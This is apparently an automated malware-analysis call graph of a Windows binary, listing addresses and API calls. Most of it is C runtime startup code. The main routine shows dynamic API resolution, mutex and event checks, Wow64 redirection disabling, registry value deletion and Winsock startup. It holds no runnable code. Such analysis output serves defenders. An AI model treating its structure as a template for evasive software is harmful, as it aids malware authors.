32c64c LeaveCriticalSection 17692->17706 17693->17677 17694 3295b7 DecodePointer 17700 32800e EncodePointer 17694->17700 17697->17687 17697->17694 17698 3295c6 DecodePointer DecodePointer 17697->17698 17699 32800e EncodePointer 17697->17699 17698->17697 17699->17697 17700->17697 17702 329643 17701->17702 17703 329669 17701->17703 17702->17685 17705 32c64c LeaveCriticalSection 17702->17705 17704 32c64c _doexit LeaveCriticalSection 17703->17704 17704->17702 17705->17690 17706->17693 17707->17618 17708->17633 17714 3260ff 17754 32b160 17714->17754 17716 32610b GetStartupInfoW 17717 32611f HeapSetInformation 17716->17717 17719 32612a 17716->17719 17717->17719 17755 3298ee HeapCreate 17719->17755 17720 326178 17723 326183 17720->17723 18044 3260d6 17720->18044 17756 328307 GetModuleHandleW 17723->17756 17724 326189 17725 326194 __RTC_Initialize 17724->17725 17726 3260d6 _fast_error_exit 66 API calls 17724->17726 17781 32aecf GetStartupInfoW 17725->17781 17726->17725 17729 3261ae GetCommandLineA 17794 32ae38 GetEnvironmentStringsW 17729->17794 17730 3296c2 __amsg_exit 66 API calls 17732 3261ad 17730->17732 17732->17729 17736 3261d3 17820 32ab07 17736->17820 17737 3296c2 __amsg_exit 66 API calls 17737->17736 17739 3261d9 17740 3261e4 17739->17740 17742 3296c2 __amsg_exit 66 API calls 17739->17742 17840 3294a1 17740->17840 17742->17740 17743 3261ec 17744 3261f7 17743->17744 17745 3296c2 __amsg_exit 66 API calls 17743->17745 17846 32aaa8 17744->17846 17745->17744 17754->17716 17755->17720 17757 328324 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 17756->17757 17758 32831b 17756->17758 17761 32836e TlsAlloc 17757->17761 18052 328054 17758->18052 17763 3283bc TlsSetValue 17761->17763 17764 32847d 17761->17764 17763->17764 17765 3283cd 17763->17765 17764->17724 18062 32944a 17765->18062 17770 328415 DecodePointer 17773 32842a 17770->17773 17771 328478 17772 328054 __mtterm 70 API calls 17771->17772 17772->17764 17773->17771 17774 32c193 __calloc_crt 66 API calls 17773->17774 17775 328440 17774->17775 17775->17771 17776 328448 DecodePointer 17775->17776 17777 328459 17776->17777 17777->17771 17778 32845d 17777->17778 17779 328091 __getptd_noexit 66 API calls 17778->17779 17780 328465 GetCurrentThreadId 17779->17780 17780->17764 17782 32c193 __calloc_crt 66 API calls 17781->17782 17793 32aeed 17782->17793 17783 32b098 GetStdHandle 17789 32b062 17783->17789 17784 32c193 __calloc_crt 66 API calls 17784->17793 17785 32b0fc SetHandleCount 17787 3261a2 17785->17787 17786 32b0aa GetFileType 17786->17789 17787->17729 17787->17730 17788 32afe2 17788->17789 17790 32b019 InitializeCriticalSectionAndSpinCount 17788->17790 17791 32b00e GetFileType 17788->17791 17789->17783 17789->17785 17789->17786 17792 32b0d0 InitializeCriticalSectionAndSpinCount 17789->17792 17790->17787 17790->17788 17791->17788 17791->17790 17792->17787 17792->17789 17793->17784 17793->17787 17793->17788 17793->17789 17793->17793 17795 32ae54 WideCharToMultiByte 17794->17795 17800 3261be 17794->17800 17797 32aec1 FreeEnvironmentStringsW 17795->17797 17798 32ae89 17795->17798 17797->17800 17799 32c14e __malloc_crt 66 API calls 17798->17799 17801 32ae8f 17799->17801 17807 32ad7d 17800->17807 17801->17797 17802 32ae97 WideCharToMultiByte 17801->17802 17803 32aeb5 FreeEnvironmentStringsW 17802->17803 17804 32aea9 17802->17804 17803->17800 17805 3246ad _free 66 API calls 17804->17805 17806 32aeb1 17805->17806 17806->17803 17808 32ad92 17807->17808 17809 32ad97 GetModuleFileNameA 17807->17809 18079 328ffe 17808->18079 17810 32adbe 17809->17810 18073 32abe3 17810->18073 17814 3261c8 17814->17736 17814->17737 17815 32adfa 17816 32c14e __malloc_crt 66 API calls 17815->17816 17817 32ae00 17816->17817 17817->17814 17818 32abe3 _parse_cmdline 76 API calls 17817->17818 17819 32ae1a 17818->17819 17819->17814 17821 32ab10 17820->17821 17823 32ab15 _strlen 17820->17823 17822 328ffe ___initmbctable 94 API calls 17821->17822 17822->17823 17824 32c193 __calloc_crt 66 API calls 17823->17824 17827 32ab23 17823->17827 17829 32ab4a _strlen 17824->17829 17825 32ab99 17826 3246ad _free 66 API calls 17825->17826 17826->17827 17827->17739 17828 32c193 __calloc_crt 66 API calls 17828->17829 17829->17825 17829->17827 17829->17828 17830 32abbf 17829->17830 17833 32abd6 17829->17833 18520 3288d8 17829->18520 17832 3246ad _free 66 API calls 17830->17832 17832->17827 17834 32723a __invoke_watson 10 API calls 17833->17834 17836 32abe2 17834->17836 17835 32de27 __wincmdln 76 API calls 17835->17836 17836->17835 17837 32ac6f 17836->17837 17838 32ad6d 17837->17838 17839 32de27 76 API calls __wincmdln 17837->17839 17838->17739 17839->17837 17841 3294af __IsNonwritableInCurrentImage 17840->17841 18529 32c12b 17841->18529 17843 3294cd __initterm_e 17845 3294ee __IsNonwritableInCurrentImage 17843->17845 18532 328792 17843->18532 17845->17743 17847 32aab6 17846->17847 17849 32aabb 17846->17849 17848 328ffe ___initmbctable 94 API calls 17847->17848 17848->17849 17850 32de27 __wincmdln 76 API calls 17849->17850 17851 3261fd 17849->17851 17850->17849 17852 301000 17851->17852 17853 30100d __write_nolock 17852->17853 18597 318110 LoadLibraryW 17853->18597 17856 301045 _memset 17858 301061 GetModuleFileNameW 17856->17858 17857 30103d ExitProcess 17859 301084 17858->17859 17860 30107c ExitProcess 17858->17860 18681 309c90 LoadLibraryW 17859->18681 17866 3010f3 ExitProcess 17867 3010fb 17868 301109 17867->17868 18689 312680 17867->18689 18696 30b860 17868->18696 17872 301117 OpenEventW 17875 301137 RtlExitUserThread 17872->17875 17876 30113f OpenEventW 17872->17876 17873 301199 18787 3100a0 GetCommandLineW CommandLineToArgvW lstrcmpiW 17873->18787 17875->17876 17878 301172 SetEvent CloseHandle 17876->17878 17879 30116a RtlExitUserThread 17876->17879 18713 31bb20 OpenMutexW LoadLibraryW LocalAlloc 17878->18713 17879->17878 17880 3011a2 ExitProcess 17881 3011aa OpenMutexW 17883 3011d5 CloseHandle ExitProcess 17881->17883 17884 3011ea CreateMutexW 17881->17884 17886 301205 17884->17886 17887 3011fd ExitProcess 17884->17887 17888 30126e 17886->17888 17890 31c3a0 3 API calls 17886->17890 17889 3012d3 CreateMutexW 17888->17889 18827 31c090 GetModuleHandleA GetProcAddress 17888->18827 17891 3012f1 ExitProcess 17889->17891 17892 3012f9 GetLastError 17889->17892 17893 30121c 17890->17893 17894 301306 ExitProcess 17892->17894 17895 30130e CreateMutexW 17892->17895 17893->17888 17901 31c090 3 API calls 17893->17901 17898 301334 17895->17898 17899 30132c ExitProcess 17895->17899 18887 31c4b0 ConvertStringSecurityDescriptorToSecurityDescriptorW 17898->18887 17904 301225 17901->17904 17904->17888 17905 30122a 17904->17905 17909 31c1e0 3 API calls 17905->17909 17907 301360 ExitProcess 17908 301368 17910 31c4b0 4 API calls 17908->17910 17911 30122f 17909->17911 17913 301372 17910->17913 17914 301252 17911->17914 17915 301234 17911->17915 17917 301382 GetModuleFileNameW 17913->17917 17918 301543 WSAStartup 17913->17918 17924 301c80 155 API calls 17914->17924 19010 301c80 CreateEventW 17915->19010 17916 3012a5 17916->17889 18874 316870 LocalAlloc 17916->18874 17922 30153b ExitProcess 17917->17922 17923 30139e 17917->17923 17919 301556 ExitProcess 17918->17919 17920 30155e 17918->17920 18892 30fa30 GetModuleHandleW 17920->18892 19034 30fe20 17923->19034 17928 30125e 17924->17928 17928->17888 17933 301266 ExitProcess 17928->17933 17930 301250 17930->17888 17931 301248 ExitProcess 17934 301567 ExitProcess 17935 30156f 18898 317600 17935->18898 17940 301531 ExitProcess 17941 3013db 17945 3013e9 LocalAlloc 17941->17945 17942 301580 18902 3141e0 17942->18902 17943 301578 ExitProcess 17946 301411 GetTempPathW 17945->17946 17947 301522 LocalFree 17945->17947 17949 30142b 17946->17949 17950 30150d ExitProcess 17946->17950 17951 301539 17947->17951 17956 301439 lstrcmpiW 17949->17956 17951->17918 17952 301591 18912 3142a0 17952->18912 17953 301589 ExitProcess 17959 30150b LocalFree 17956->17959 17960 30145d lstrcmpiW 17956->17960 17957 3015a2 18925 3143d0 17957->18925 17958 30159a ExitProcess 17959->17947 17960->17959 17962 301479 GetCommandLineW CommandLineToArgvW lstrcmpiW 17960->17962 17962->17959 17965 3014b8 lstrcmpiW 17962->17965 17965->17959 17968 3014d1 lstrcmpiW 17965->17968 17966 3015b3 17969 3015d5 17966->17969 17970 3015bc 17966->17970 17967 3015ab ExitProcess 17968->17959 17971 3014ea MessageBoxW 17968->17971 18935 30ff10 SHGetKnownFolderPath 17969->18935 19043 30fad0 17970->19043 17971->17959 17973 301503 ExitProcess 17971->17973 17978 3015e6 ExitProcess 17979 3015ee 17980 301612 17979->17980 17981 301600 17979->17981 18045 3260e4 18044->18045 18046 3260e9 18044->18046 18047 3298b5 __FF_MSGBANNER 66 API calls 18045->18047 18048 329706 __NMSG_WRITE 66 API calls 18046->18048 18047->18046 18049 3260f1 18048->18049 18050 329420 _malloc 3 API calls 18049->18050 18051 3260fb 18050->18051 18051->17723 18053 32806d 18052->18053 18054 32805e DecodePointer 18052->18054 18055 32807e TlsFree 18053->18055 18056 32808c 18053->18056 18054->18053 18055->18056 18057 32c611 DeleteCriticalSection 18056->18057 18058 32c629 18056->18058 18059 3246ad _free 66 API calls 18057->18059 18060 32c63b DeleteCriticalSection 18058->18060 18061 328320 18058->18061 18059->18056 18060->18058 18061->17724 18071 32800e EncodePointer 18062->18071 18064 329452 __init_pointers __initp_misc_winsig 18072 328506 EncodePointer 18064->18072 18066 3283d2 EncodePointer EncodePointer EncodePointer EncodePointer 18067 32c5ab 18066->18067 18068 32c5b6 18067->18068 18069 32c5c0 InitializeCriticalSectionAndSpinCount 18068->18069 18070 328411 18068->18070 18069->18068 18069->18070 18070->17770 18070->17771 18071->18064 18072->18066 18075 32ac02 18073->18075 18077 32ac6f 18075->18077 18083 32de27 18075->18083 18076 32ad6d 18076->17814 18076->17815 18077->18076 18078 32de27 76 API calls __wincmdln 18077->18078 18078->18077 18080 329007 18079->18080 18081 32900e 18079->18081 18407 328e63 18080->18407 18081->17809 18086 32ddd4 18083->18086 18089 324404 18086->18089 18090 324417 18089->18090 18096 324464 18089->18096 18097 3281be 18090->18097 18093 324444 18093->18096 18117 328b5a 18093->18117 18096->18075 18098 328145 __getptd_noexit 66 API calls 18097->18098 18099 3281c6 18098->18099 18100 32441c 18099->18100 18101 3296c2 __amsg_exit 66 API calls 18099->18101 18100->18093 18102 3292dc 18100->18102 18101->18100 18103 3292e8 _raise 18102->18103 18104 3281be __getptd 66 API calls 18103->18104 18105 3292ed 18104->18105 18106 32931b 18105->18106 18108 3292ff 18105->18108 18107 32c725 __lock 66 API calls 18106->18107 18109 329322 18107->18109 18110 3281be __getptd 66 API calls 18108->18110 18133 32928f 18109->18133 18112 329304 18110->18112 18115 329312 _raise 18112->18115 18116 3296c2 __amsg_exit 66 API calls 18112->18116 18115->18093 18116->18115 18118 328b66 _raise 18117->18118 18119 3281be __getptd 66 API calls 18118->18119 18120 328b6b 18119->18120 18121 328b7d 18120->18121 18122 32c725 __lock 66 API calls 18120->18122 18124 328b8b _raise 18121->18124 18126 3296c2 __amsg_exit 66 API calls 18121->18126 18123 328b9b 18122->18123 18125 328be4 18123->18125 18128 328bb2 InterlockedDecrement 18123->18128 18129 328bcc InterlockedIncrement 18123->18129 18124->18096 18403 328bf5 18125->18403 18126->18124 18128->18129 18130 328bbd 18128->18130 18129->18125 18130->18129 18131 3246ad _free 66 API calls 18130->18131 18132 328bcb 18131->18132 18132->18129 18134 3292d1 18133->18134 18135 32929c 18133->18135 18141 329349 18134->18141 18135->18134 18136 32901c ___addlocaleref 8 API calls 18135->18136 18137 3292b2 18136->18137 18137->18134 18144 3290ab 18137->18144 18402 32c64c LeaveCriticalSection 18141->18402 18143 329350 18143->18112 18145 32913f 18144->18145 18146 3290bc InterlockedDecrement 18144->18146 18145->18134 18158 329144 18145->18158 18147 3290d1 InterlockedDecrement 18146->18147 18148 3290d4 18146->18148 18147->18148 18149 3290e1 18148->18149 18150 3290de InterlockedDecrement 18148->18150 18151 3290eb InterlockedDecrement 18149->18151 18152 3290ee 18149->18152 18150->18149 18151->18152 18153 3290f8 InterlockedDecrement 18152->18153 18154 3290fb 18152->18154 18153->18154 18155 329114 InterlockedDecrement 18154->18155 18156 329124 InterlockedDecrement 18154->18156 18157 32912f InterlockedDecrement 18154->18157 18155->18154 18156->18154 18157->18145 18159 3291c8 18158->18159 18162 32915b 18158->18162 18160 3246ad _free 66 API calls 18159->18160 18161 329215 18159->18161 18163 3291e9 18160->18163 18172 32923e 18161->18172 18228 32cdc6 18161->18228 18162->18159 18165 32918f 18162->18165 18170 3246ad _free 66 API calls 18162->18170 18166 3246ad _free 66 API calls 18163->18166 18178 3246ad _free 66 API calls 18165->18178 18187 3291b0 18165->18187 18171 3291fc 18166->18171 18168 329283 18174 3246ad _free 66 API calls 18168->18174 18169 3246ad _free 66 API calls 18169->18172 18175 329184 18170->18175 18176 3246ad _free 66 API calls 18171->18176 18172->18168 18177 3246ad 66 API calls _free 18172->18177 18173 3246ad _free 66 API calls 18179 3291bd 18173->18179 18180 329289 18174->18180 18188 32d1a6 18175->18188 18182 32920a 18176->18182 18177->18172 18183 3291a5 18178->18183 18184 3246ad _free 66 API calls 18179->18184 18180->18134 18185 3246ad _free 66 API calls 18182->18185 18216 32d13d 18183->18216 18184->18159 18185->18161 18187->18173 18189 32d1b7 18188->18189 18215 32d2a0 18188->18215 18190 32d1c8 18189->18190 18191 3246ad _free 66 API calls 18189->18191 18192 32d1da 18190->18192 18193 3246ad _free 66 API calls 18190->18193 18191->18190 18194 32d1ec 18192->18194 18195 3246ad _free 66 API calls 18192->18195 18193->18192 18196 32d1fe 18194->18196 18198 3246ad _free 66 API calls 18194->18198 18195->18194 18197 32d210 18196->18197 18199 3246ad _free 66 API calls 18196->18199 18200 32d222 18197->18200 18201 3246ad _free 66 API calls 18197->18201 18198->18196 18199->18197 18202 32d234 18200->18202 18203 3246ad _free 66 API calls 18200->18203 18201->18200 18204 32d246 18202->18204 18206 3246ad _free 66 API calls 18202->18206 18203->18202 18205 32d258 18204->18205 18207 3246ad _free 66 API calls 18204->18207 18208 32d26a 18205->18208 18209 3246ad _free 66 API calls 18205->18209 18206->18204 18207->18205 18210 3246ad _free 66 API calls 18208->18210 18211 32d27c 18208->18211 18209->18208 18210->18211 18212 32d28e 18211->18212 18213 3246ad _free 66 API calls 18211->18213 18214 3246ad _free 66 API calls 18212->18214 18212->18215 18213->18212 18214->18215 18215->18165 18217 32d1a2 18216->18217 18218 32d14a 18216->18218 18217->18187 18219 32d15a 18218->18219 18220 3246ad _free 66 API calls 18218->18220 18221 32d16c 18219->18221 18222 3246ad _free 66 API calls 18219->18222 18220->18219 18223 32d17e 18221->18223 18225 3246ad _free 66 API calls 18221->18225 18222->18221 18224 32d190 18223->18224 18226 3246ad _free 66 API calls 18223->18226 18224->18217 18227 3246ad _free 66 API calls 18224->18227 18225->18223 18226->18224 18227->18217 18229 32cdd7 18228->18229 18230 329233 18228->18230 18231 3246ad _free 66 API calls 18229->18231 18230->18169 18232 32cddf 18231->18232 18233 3246ad _free 66 API calls 18232->18233 18234 32cde7 18233->18234 18235 3246ad _free 66 API calls 18234->18235 18236 32cdef 18235->18236 18237 3246ad _free 66 API calls 18236->18237 18238 32cdf7 18237->18238 18239 3246ad _free 66 API calls 18238->18239 18240 32cdff 18239->18240 18241 3246ad _free 66 API calls 18240->18241 18242 32ce07 18241->18242 18243 3246ad _free 66 API calls 18242->18243 18244 32ce0e 18243->18244 18245 3246ad _free 66 API calls 18244->18245 18246 32ce16 18245->18246 18247 3246ad _free 66 API calls 18246->18247 18248 32ce1e 18247->18248 18249 3246ad _free 66 API calls 18248->18249 18250 32ce26 18249->18250 18251 3246ad _free 66 API calls 18250->18251 18252 32ce2e 18251->18252 18253 3246ad _free 66 API calls 18252->18253 18254 32ce36 18253->18254 18255 3246ad _free 66 API calls 18254->18255 18256 32ce3e 18255->18256 18257 3246ad _free 66 API calls 18256->18257 18258 32ce46 18257->18258 18259 3246ad _free 66 API calls 18258->18259 18260 32ce4e 18259->18260 18261 3246ad _free 66 API calls 18260->18261 18262 32ce56 18261->18262 18263 3246ad _free 66 API calls 18262->18263 18264 32ce61 18263->18264 18265 3246ad _free 66 API calls 18264->18265 18266 32ce69 18265->18266 18267 3246ad _free 66 API calls 18266->18267 18268 32ce71 18267->18268 18269 3246ad _free 66 API calls 18268->18269 18270 32ce79 18269->18270 18271 3246ad _free 66 API calls 18270->18271 18272 32ce81 18271->18272 18273 3246ad _free 66 API calls 18272->18273 18274 32ce89 18273->18274 18275 3246ad _free 66 API calls 18274->18275 18276 32ce91 18275->18276 18277 3246ad _free 66 API calls 18276->18277 18278 32ce99 18277->18278 18279 3246ad _free 66 API calls 18278->18279 18280 32cea1 18279->18280 18281 3246ad _free 66 API calls 18280->18281 18282 32cea9 18281->18282 18283 3246ad _free 66 API calls 18282->18283 18284 32ceb1 18283->18284 18285 3246ad _free 66 API calls 18284->18285 18402->18143 18406 32c64c LeaveCriticalSection 18403->18406 18405 328bfc 18405->18121 18406->18405 18408 328e6f _raise 18407->18408 18409 3281be __getptd 66 API calls 18408->18409 18410 328e78 18409->18410 18411 328b5a _LocaleUpdate::_LocaleUpdate 68 API calls 18410->18411 18412 328e82 18411->18412 18438 328bfe 18412->18438 18415 32c14e __malloc_crt 66 API calls 18416 328ea3 18415->18416 18417 328fc2 _raise 18416->18417 18445 328c7a 18416->18445 18417->18081 18420 328ed3 InterlockedDecrement 18422 328ee3 18420->18422 18423 328ef4 InterlockedIncrement 18420->18423 18421 328fcf 18421->18417 18425 328fe2 18421->18425 18426 3246ad _free 66 API calls 18421->18426 18422->18423 18428 3246ad _free 66 API calls 18422->18428 18423->18417 18424 328f0a 18423->18424 18424->18417 18429 32c725 __lock 66 API calls 18424->18429 18427 3272de __fptostr 66 API calls 18425->18427 18426->18425 18427->18417 18430 328ef3 18428->18430 18432 328f1e InterlockedDecrement 18429->18432 18430->18423 18433 328f9a 18432->18433 18434 328fad InterlockedIncrement 18432->18434 18433->18434 18436 3246ad _free 66 API calls 18433->18436 18455 328fc4 18434->18455 18437 328fac 18436->18437 18437->18434 18439 324404 _LocaleUpdate::_LocaleUpdate 76 API calls 18438->18439 18440 328c12 18439->18440 18441 328c3b 18440->18441 18442 328c1d GetOEMCP 18440->18442 18443 328c40 GetACP 18441->18443 18444 328c2d 18441->18444 18442->18444 18443->18444 18444->18415 18444->18417 18446 328bfe getSystemCP 78 API calls 18445->18446 18447 328c9a 18446->18447 18448 328ca5 setSBCS 18447->18448 18451 328ce9 IsValidCodePage 18447->18451 18453 328d0e _memset __setmbcp_nolock 18447->18453 18449 327fff __setmbcp_nolock 5 API calls 18448->18449 18450 328e61 18449->18450 18450->18420 18450->18421 18451->18448 18452 328cfb GetCPInfo 18451->18452 18452->18448 18452->18453 18458 3289ca GetCPInfo 18453->18458 18519 32c64c LeaveCriticalSection 18455->18519 18457 328fcb 18457->18417 18460 3289fe _memset 18458->18460 18467 328ab2 18458->18467 18468 32cd86 18460->18468 18462 327fff __setmbcp_nolock 5 API calls 18464 328b58 18462->18464 18464->18453 18466 32cc59 ___crtLCMapStringA 82 API calls 18466->18467 18467->18462 18469 324404 _LocaleUpdate::_LocaleUpdate 76 API calls 18468->18469 18470 32cd99 18469->18470 18478 32cc9f 18470->18478 18473 32cc59 18474 324404 _LocaleUpdate::_LocaleUpdate 76 API calls 18473->18474 18475 32cc6c 18474->18475 18495 32ca72 18475->18495 18479 32ccc8 MultiByteToWideChar 18478->18479 18480 32ccbd 18478->18480 18483 32ccf5 18479->18483 18490 32ccf1 18479->18490 18480->18479 18481 32cd0a _memset __crtLCMapStringA_stat 18485 32cd43 MultiByteToWideChar 18481->18485 18481->18490 18482 327fff __setmbcp_nolock 5 API calls 18484 328a6d 18482->18484 18483->18481 18486 324619 _malloc 66 API calls 18483->18486 18484->18473 18487 32cd6a 18485->18487 18488 32cd59 GetStringTypeW 18485->18488 18486->18481 18491 32ca52 18487->18491 18488->18487 18490->18482 18492 32ca6f 18491->18492 18493 32ca5e 18491->18493 18492->18490 18493->18492 18494 3246ad _free 66 API calls 18493->18494 18494->18492 18497 32ca90 MultiByteToWideChar 18495->18497 18498 32caee 18497->18498 18500 32caf5 18497->18500 18499 327fff __setmbcp_nolock 5 API calls 18498->18499 18502 328a8d 18499->18502 18503 324619 _malloc 66 API calls 18500->18503 18509 32cb0e __crtLCMapStringA_stat 18500->18509 18501 32cb42 MultiByteToWideChar 18504 32cc3a 18501->18504 18505 32cb5b LCMapStringW 18501->18505 18502->18466 18503->18509 18506 32ca52 __freea 66 API calls 18504->18506 18505->18504 18507 32cb7a 18505->18507 18506->18498 18508 32cb84 18507->18508 18512 32cbad 18507->18512 18508->18504 18510 32cb98 LCMapStringW 18508->18510 18509->18498 18509->18501 18510->18504 18511 32cbfc LCMapStringW 18513 32cc12 WideCharToMultiByte 18511->18513 18514 32cc34 18511->18514 18515 32cbc8 __crtLCMapStringA_stat 18512->18515 18516 324619 _malloc 66 API calls 18512->18516 18513->18514 18517 32ca52 __freea 66 API calls 18514->18517 18515->18504 18515->18511 18516->18515 18517->18504 18519->18457 18521 3288e6 18520->18521 18522 3288ed 18520->18522 18521->18522 18527 32890b 18521->18527 18523 3272de __fptostr 66 API calls 18522->18523 18524 3288f2 18523->18524 18525 32728c __fptostr 11 API calls 18524->18525 18526 3288fc 18525->18526 18526->17829 18527->18526 18528 3272de __fptostr 66 API calls 18527->18528 18528->18524 18530 32c131 EncodePointer 18529->18530 18530->18530 18531 32c14b 18530->18531 18531->17843 18535 328756 18532->18535 18534 32879f 18534->17845 18536 328762 _raise 18535->18536 18543 329438 18536->18543 18542 328783 _raise 18542->18534 18544 32c725 __lock 66 API calls 18543->18544 18545 328767 18544->18545 18546 32866f DecodePointer DecodePointer 18545->18546 18547 32871e 18546->18547 18548 32869d 18546->18548 18557 32878c 18547->18557 18548->18547 18560 32c8c7 18548->18560 18550 328701 EncodePointer EncodePointer 18550->18547 18551 3286af 18551->18550 18553 3286d3 18551->18553 18567 32c1df 18551->18567 18553->18547 18554 32c1df __realloc_crt 70 API calls 18553->18554 18556 3286ef EncodePointer 18553->18556 18555 3286e9 18554->18555 18555->18547 18555->18556 18556->18550 18593 329441 18557->18593 18561 32c8d2 18560->18561 18562 32c8e7 HeapSize 18560->18562 18563 3272de __fptostr 66 API calls 18561->18563 18562->18551 18564 32c8d7 18563->18564 18565 32728c __fptostr 11 API calls 18564->18565 18566 32c8e2 18565->18566 18566->18551 18571 32c1e8 18567->18571 18569 32c227 18569->18553 18570 32c208 Sleep 18570->18571 18571->18569 18571->18570 18572 32e464 18571->18572 18573 32e47a 18572->18573 18574 32e46f 18572->18574 18576 32e482 18573->18576 18585 32e48f 18573->18585 18575 324619 _malloc 66 API calls 18574->18575 18577 32e477 18575->18577 18578 3246ad _free 66 API calls 18576->18578 18577->18571 18592 32e48a _free 18578->18592 18579 32e4c7 18580 3287b8 _malloc DecodePointer 18579->18580 18582 32e4cd 18580->18582 18581 32e497 HeapReAlloc 18581->18585 18581->18592 18583 3272de __fptostr 66 API calls 18582->18583 18583->18592 18584 32e4f7 18587 3272de __fptostr 66 API calls 18584->18587 18585->18579 18585->18581 18585->18584 18586 3287b8 _malloc DecodePointer 18585->18586 18589 32e4df 18585->18589 18586->18585 18588 32e4fc GetLastError 18587->18588 18588->18592 18590 3272de __fptostr 66 API calls 18589->18590 18591 32e4e4 GetLastError 18590->18591 18591->18592 18592->18571 18596 32c64c LeaveCriticalSection 18593->18596 18595 328791 18595->18542 18596->18595 18600 318134 18597->18600 18634 301036 18597->18634 18598 3181f6 LoadLibraryW 18605 318211 18598->18605 18598->18634 18599 3181b1 GetProcAddress 18599->18600 18636 3181a8 18599->18636 18600->18598 18604 318150 18600->18604 18601 3182eb LoadLibraryW 18610 318306 18601->18610 18601->18634 18602 318173 GetProcAddress 18602->18604 18602->18636 18603 3182a0 GetProcAddress 18603->18605 18603->18636 18604->18599 18604->18600 18604->18602 18605->18601 18609 318239 18605->18609 18606 3183e0 LoadLibraryW 18615 3183fb 18606->18615 18606->18634 18607 31825f GetProcAddress 18607->18609 18607->18636 18608 318395 GetProcAddress 18608->18610 18608->18636 18609->18603 18609->18605 18609->18607 18610->18606 18614 31832e 18610->18614 18611 3184d5 LoadLibraryW 18622 3184f0 18611->18622 18611->18634 18612 318354 GetProcAddress 18612->18614 18612->18636 18613 31848a GetProcAddress 18613->18615 18613->18636 18614->18608 18614->18610 18614->18612 18615->18611 18619 318423 18615->18619 18616 318449 GetProcAddress 18616->18619 18616->18636 18617 3185ca LoadLibraryW 18624 3185e5 18617->18624 18617->18634 18618 31857f GetProcAddress 18618->18622 18618->18636 18619->18613 18619->18615 18619->18616 18620 31853e GetProcAddress 18620->18622 18620->18634 18621 3186bf LoadLibraryW 18631 3186da 18621->18631 18621->18634 18622->18617 18622->18618 18622->18620 18623 318674 GetProcAddress 18623->18624 18623->18636 18624->18621 18627 31860d 18624->18627 18625 318633 GetProcAddress 18625->18627 18625->18636 18626 3187b4 LoadLibraryW 18628 3187cf 18626->18628 18626->18634 18627->18623 18627->18624 18627->18625 18632 3188a9 LoadLibraryW 18628->18632 18640 3187f7 18628->18640 18629 318769 GetProcAddress 18629->18631 18629->18636 18630 318702 18630->18629 18630->18631 18633 318728 GetProcAddress 18630->18633 18631->18626 18631->18630 18632->18634 18641 3188c4 18632->18641 18633->18630 18633->18636 18634->17856 18634->17857 18635 31885e GetProcAddress 18635->18628 18635->18636 18636->18634 18637 31899e LoadLibraryW 18637->18634 18646 3189b9 18637->18646 18638 31881d GetProcAddress 18638->18636 18638->18640 18639 318953 GetProcAddress 18639->18636 18639->18641 18640->18628 18640->18635 18640->18638 18641->18637 18645 3188ec 18641->18645 18642 318a93 LoadLibraryW 18642->18634 18651 318aae 18642->18651 18643 318912 GetProcAddress 18643->18636 18643->18645 18644 318a48 GetProcAddress 18644->18636 18644->18646 18645->18639 18645->18641 18645->18643 18646->18642 18650 3189e1 18646->18650 18647 318b88 LoadLibraryW 18647->18634 18656 318ba3 18647->18656 18648 318a07 GetProcAddress 18648->18636 18648->18650 18649 318b3d GetProcAddress 18649->18636 18649->18651 18650->18644 18650->18646 18650->18648 18651->18647 18655 318ad6 18651->18655 18652 318c7d LoadLibraryW 18652->18634 18661 318c98 18652->18661 18653 318afc GetProcAddress 18653->18636 18653->18655 18654 318c32 GetProcAddress 18654->18636 18654->18656 18655->18649 18655->18651 18655->18653 18656->18652 18660 318bcb 18656->18660 18657 318bf1 GetProcAddress 18657->18636 18657->18660 18658 318d72 LoadLibraryW 18658->18634 18666 318d8d 18658->18666 18659 318d27 GetProcAddress 18659->18636 18659->18661 18660->18654 18660->18656 18660->18657 18661->18658 18664 318cc0 18661->18664 18662 318ce6 GetProcAddress 18662->18636 18662->18664 18663 318e67 LoadLibraryW 18663->18634 18674 318e82 18663->18674 18664->18659 18664->18661 18664->18662 18665 318e1c GetProcAddress 18665->18636 18665->18666 18666->18663 18669 318db5 18666->18669 18667 318ddb GetProcAddress 18667->18636 18667->18669 18668 318f5c LoadLibraryW 18668->18634 18677 318f77 18668->18677 18669->18665 18669->18666 18669->18667 18670 318f11 GetProcAddress 18670->18636 18670->18674 18671 319051 LoadLibraryW 18671->18634 18678 31906c 18671->18678 18672 318ed0 GetProcAddress 18672->18634 18672->18674 18673 319006 GetProcAddress 18673->18636 18673->18677 18674->18668 18674->18670 18674->18672 18675 318fc5 GetProcAddress 18675->18634 18675->18677 18676 3190f8 GetProcAddress 18676->18636 18676->18678 18677->18671 18677->18673 18677->18675 18678->18634 18680 319094 18678->18680 18679 3190ba GetProcAddress 18679->18636 18679->18680 18680->18676 18680->18678 18680->18679 18682 301089 18681->18682 18683 309caa GetProcAddress 18681->18683 18686 31c1e0 GetModuleHandleW GetProcAddress 18682->18686 18684 309cc2 18683->18684 18685 309cc8 FreeLibrary 18683->18685 18684->18685 18685->18682 18687 31c21c GetCurrentProcess 18686->18687 18688 30108e Wow64DisableWow64FsRedirection GetCurrentProcess CreateMutexW 18686->18688 18687->18688 18688->17866 18688->17867 18690 31268d RegOpenKeyW 18689->18690 18691 3126be 18689->18691 18690->18691 18692 3126a5 RegDeleteValueW RegCloseKey 18690->18692 18693 3126c7 RegOpenKeyW 18691->18693 18694 3126f8 18691->18694 18692->18691 18693->18694 18695 3126df RegDeleteValueW RegCloseKey 18693->18695 18694->17868 18695->18694 19118 323520 18696->19118 18699 30b8a4 _memset 18700 30b8c0 GetWindowsDirectoryW 18699->18700 18701 30b8dd _memset 18700->18701 18710 30110e 18700->18710 18702 30b8f9 GetSystemDirectoryW 18701->18702 18703 30b916 _memset 18702->18703 18702->18710 18704 32359a __snwprintf 102 API calls 18703->18704 18705 30b952 _memset 18704->18705 18706 32359a __snwprintf 102 API calls 18705->18706 18707 30b991 _memset 18706->18707 18708 32359a __snwprintf 102 API calls 18707->18708 18709 30b9d0 StrCmpIW 18708->18709 18709->18710 18711 30b9eb StrCmpIW 18709->18711 18710->17872 18710->17873 18711->18710 18712 30ba03 StrCmpIW 18711->18712 18712->18710 18714 31bb72 GetModuleFileNameW 18713->18714 18753 31bb68 18713->18753 18715 31bb91 18714->18715 18714->18753 18718 31bbb0 OpenMutexW 18715->18718 18759 31bbab 18715->18759 18721 31bbe5 18718->18721 18718->18753 18720 301191 RtlExitUserThread 18720->17873 19120 302160 18721->19120 18722 31be60 19256 305060 18722->19256 18732 31be73 ExitProcess 18733 31be7b 19265 316be0 